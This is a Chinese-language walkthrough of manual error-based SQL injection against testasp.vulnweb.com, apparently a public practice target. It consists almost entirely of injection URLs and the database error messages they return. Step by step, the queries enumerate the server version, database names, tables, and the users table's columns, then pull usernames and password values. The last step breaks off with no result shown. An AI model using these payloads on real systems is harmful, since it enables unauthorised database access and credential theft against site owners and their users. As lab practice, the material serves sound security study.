sql server手工注入
测试网站testasp.vulnweb.com
1.
http://testasp.vulnweb.com/showforum.asp?id=0
http://testasp.vulnweb.com/showforum.asp?id=0'
http://testasp.vulnweb.com/showforum.asp?id=0 and 1=1
http://testasp.vulnweb.com/showforum.asp?id=0 and 1=2
2.数据库版本
http://testasp.vulnweb.com/showforum.asp?id=0 and 1=(select @@version)
3.数据库名
http://testasp.vulnweb.com/showforum.asp?id=0 and 1=(select db_name())
4.第一个数据库
http://testasp.vulnweb.com/showforum.asp?id=0 and 1=(select top 1 name from master..sysdatabases where dbid>4)
返回Conversion failed when converting the nvarchar value 'acublog' to data type int
5.
http://testasp.vulnweb.com/showforum.asp?id=0 and 1=(select top 1 name from master..sysdatabases where dbid>4 and name<> 'acublog')
返回Conversion failed when converting the nvarchar value 'acuforum' to data type int
http://testasp.vulnweb.com/showforum.asp?id=0 and 1=(select top 1 name from master..sysdatabases where dbid>4 and name<> 'acublog' and name<> 'acuforum')
返回Conversion failed when converting the nvarchar value 'acuservice' to data type int.
http://testasp.vulnweb.com/showforum.asp?id=0 and 1=(select top 1 name from master..sysdatabases where dbid>4 and name<> 'acublog' and name<> 'acuforum' and name<> 'acuservice')
返回Either BOF or EOF is True, or the current record has been deleted. Requested operation requires a current record.
那就这几个数据库了
6.获取表名
http://testasp.vulnweb.com/showforum.asp?id=0 and 1=(select top 1 name from sysobjects where xtype='u')
返回Conversion failed when converting the nvarchar value 'threads' to data type int.
http://testasp.vulnweb.com/showforum.asp?id=0 and 1=(select top 1 name from sysobjects where xtype='u' and name<> 'threads')
返回Conversion failed when converting the nvarchar value 'users' to data type int
http://testasp.vulnweb.com/showforum.asp?id=0 and 1=(select top 1 name from sysobjects where xtype='u' and name<> 'threads' and name<> 'users')
返回Conversion failed when converting the nvarchar value 'forums' to data type int.
http://testasp.vulnweb.com/showforum.asp?id=0 and 1=(select top 1 name from sysobjects where xtype='u' and name<> 'threads' and name<> 'users' and name<> 'forums')
返回Conversion failed when converting the nvarchar value 'posts' to data type int.
http://testasp.vulnweb.com/showforum.asp?id=0 and 1=(select top 1 name from sysobjects where xtype='u' and name<> 'threads' and name<> 'users' and name<> 'forums' and name<> 'posts')
返回Either BOF or EOF is True, or the current record has been deleted. Requested operation requires a current record.
7.users的列名
http://testasp.vulnweb.com/showforum.asp?id=0 and 1=(select top 1 name from syscolumns where id=(select id from sysobjects where name = 'users'))
返回Conversion failed when converting the nvarchar value 'uname' to data type int.
http://testasp.vulnweb.com/showforum.asp?id=0 and 1=(select top 1 name from syscolumns where id=(select id from sysobjects where name = 'users') and name<> 'uname')
返回Conversion failed when converting the nvarchar value 'upass' to data type int.
http://testasp.vulnweb.com/showforum.asp?id=0 and 1=(select top 1 name from syscolumns where id=(select id from sysobjects where name = 'users') and name<> 'uname' and name<> 'upass')
返回Conversion failed when converting the nvarchar value 'email' to data type int.
http://testasp.vulnweb.com/showforum.asp?id=0 and 1=(select top 1 name from syscolumns where id=(select id from sysobjects where name = 'users') and name<> 'uname' and name<> 'upass' and name<> 'email')
返回Conversion failed when converting the nvarchar value 'realname' to data type int.
http://testasp.vulnweb.com/showforum.asp?id=0 and 1=(select top 1 name from syscolumns where id=(select id from sysobjects where name = 'users') and name<> 'uname' and name<> 'upass' and name<> 'email' and name<> 'realname')
返回Conversion failed when converting the nvarchar value 'avatar' to data type int.
http://testasp.vulnweb.com/showforum.asp?id=0 and 1=(select top 1 name from syscolumns where id=(select id from sysobjects where name = 'users') and name<> 'uname' and name<> 'upass' and name<> 'email' and name<> 'realname' and name<> 'avatar')
返回Either BOF or EOF is True, or the current record has been deleted. Requested operation requires a current record.
forums的列名
http://testasp.vulnweb.com/showforum.asp?id=0 and 1=(select top 1 name from syscolumns where id=(select id from sysobjects where name = 'forums'))
8.
http://testasp.vulnweb.com/showforum.asp?id=0 and 1=(select top 1 uname from users)
返回Conversion failed when converting the nvarchar value '--' to data type int.
http://testasp.vulnweb.com/showforum.asp?id=0 and 1=(select top 1 upass from users)
返回Conversion failed when converting the nvarchar value 'none' to data type int.
http://testasp.vulnweb.com/showforum.asp?id=0 and 1=(select top 1 uname from users where id =2)
返回